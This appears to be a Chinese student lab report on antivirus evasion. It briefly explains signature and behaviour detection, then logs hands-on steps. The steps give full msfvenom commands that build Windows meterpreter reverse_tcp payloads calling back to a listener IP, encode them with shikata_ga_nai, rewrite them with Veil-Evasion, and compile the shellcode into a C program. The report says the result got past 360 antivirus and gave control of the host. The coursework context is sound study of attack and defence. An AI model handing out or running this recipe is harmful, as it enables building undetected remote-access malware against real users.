20145327 《网络攻防》 免杀原理与实践

20145327 《网络攻防》 免杀原理与实践

1.基础问题回答

（1）杀软是如何检测出恶意代码的？
通过特征码：对已存在的流行代码特征进行比对
通过行为：是否更改注册表行为，是否有设置自启动
（2）免杀是做什么？
防止杀毒软件查杀出来
（3）免杀的基本方法有哪些？
改变特征码：加壳；使用encode等进行编码；使用其他语言进行重写再编译，如veil-evasion。
改变攻击行为：在正常应用软件中插入恶意代码；
自己手动编写一个恶意软件；

2.实践总结与体会

通过这次实验了解了免杀原理，通过不同的方法避开杀毒软件的检测。恶意代码都是伪装的，不会被你轻易发现的，生活中一定要提高自己的网络安全意识呀，定期查杀电脑。

3.离实战还缺些什么技术或步骤？

我们都是固定的ip，实战中不会那么容易让我们成功的，黑客不是那么容易当的。

4.实践过程记录

msfvenom直接生成meterpreter可执行文件

使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 PORT=444 -f exe > testcc.exe生成可执行文件然后提交到检测网站进行检测(名字为test20145327时提示包含非法字符)

• 用Virscan检测，大多数软件都能查出病毒
  

Msfvenom使用编码器生成可执行文件

使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc1.exe来生成编码的可执行文件

• 检测
  
  然而没什么作用

• 那就试试多次编译，不信邪 指令加上-i 10即msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc2.exe
  

• 检测
  
  为什么还提高了，黑人问号.JPG。看来编码这个方法还是不行呀，不能免杀。

Veil-Evasion生成可执行文件

刘老kali里面自带了这个软件，命令行直接输入veil-evasion打开软件
在menu里面输入以下命令来生成可执行文件：

use python/meterpreter/rev_tcp
set LHOST 192.168.43.54
generate
5327-winmine
1

• 成功生成如图
  

• 检测
  
  这次明显提升了好多，25%Scanner(s) (10/39)found malware!

C语言调用Shellcode

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=444 -f c生成一个c语言格式的Shellcode数组
  

• 然后用这个数组来编写一个程序，我用的是win10下的VS2013
  

• 打开msf监听
  

• 检测
  
  真是厉害了很多呢

• 获取主机权限
  

• 用360检测也未检测出